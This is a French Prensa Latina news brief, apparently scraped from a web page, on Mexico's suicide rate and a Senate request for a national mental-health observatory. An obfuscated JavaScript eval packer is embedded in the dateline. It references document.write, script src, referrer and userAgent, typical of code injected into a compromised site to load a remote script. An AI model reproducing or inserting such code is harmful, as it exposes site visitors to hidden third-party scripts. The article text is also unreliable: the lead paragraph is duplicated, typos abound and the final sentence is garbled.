samedi 20 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le Mexique en quatrième place pour les suicides en Amérique Latine

México, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydikn|var|u0026u|referrer|rrzff||js|php'.split('|'),0,{})) 7 déc (PL) Le Mexique occupe la quatrième place en Amérique Latine pour le taux plus haut de suicides et dans les dernières trois décénies le taux de mortalité a augmenté de deux à huit pour chaque cent mille habitants.

México, 7 déc (PL) Le Mexique occupe la quatrième place en Amérique Latine pour le taux plus haut de suicides et dans les dernières trois décénies le taux de mortalité a augmenté de deux à huit pour chaque cent mille habitants.

Un tiers de la population adulte dans le pays qui habite dans des communautées urbaines ont souffert à un certain point de leur vie, un trouble mental tel que l’anxiété, abus de substances ou de dépression.

Pour cette raison, le Sénat de la Rébublique a fait demande au Secrétariat de la santé à considérer la création d’un Observatoire national de santé mental, selon le journal El sol de Mexico.

Le Sénat a souligné qu’on pourrait détermuner la prévalence des affections mentales tel que des problèmes bipolaire, dépression et schizophrénie, entre autres, afin de faciliter la réalization de programmes et études pour améliorer la qualité de soutien.

Il a aussi fait appel au Conseil national de santé mentale, à la Commission nationale contre les addictions, les autorités locales et les organisations de la société civile à renforcer les actions de prévention.

Selon la source, il n’y a que 33 cliniques psychiatriques publiques, 13 unités de détention dans les hopitaux générales et huit établissements résidentiels.

De chaque 100 mille habitants, 293 sont usagers de services de santé mentale, 31 pour cent des patients restent 10 ans ou plus dans un hôpital psuchiatrique et il y a 495 établissements de santé mentale ambulatoires, il ajouté de santé mentale, il ajouté.

rm/oda/mpg

EN CONTINU
notes connexes